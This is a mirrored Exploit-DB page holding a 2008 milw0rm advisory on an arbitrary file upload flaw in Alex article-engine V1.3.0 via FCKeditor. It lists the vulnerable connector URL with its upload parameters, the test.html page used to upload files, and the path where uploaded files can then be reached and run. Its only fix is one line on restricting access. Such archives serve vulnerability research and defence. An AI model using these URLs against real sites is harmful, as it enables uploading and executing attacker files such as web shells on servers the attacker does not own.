bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/7158.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

51 lines
No EOL
1.2 KiB
Text
Raw Blame History

########################################################################
#
# Yellow Flood Organization
#
# Alex article-engine V1.3.0 (fckeditor) Arbitrary File Upload
#
# Source: http://www.alexscriptengine.de/blog/category/article-engine/
#
# Download: http://www.alexscriptengine.de/blog/asedownloads/article-engine/
#
# Discover by: Batter
#
########################################################################
####################
- Vulnerability:
####################
/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?
Command=FileUpload&Type=File&CurrentFolder=/
####################
- Exploit:
####################
http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html
####################
- how To use:
####################
http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources.
####################
- Greets :
####################
THE.HACKER.ONE , Str0ke
####################
# milw0rm.com [2008-11-19]
Reference in a new issue View git blame Copy permalink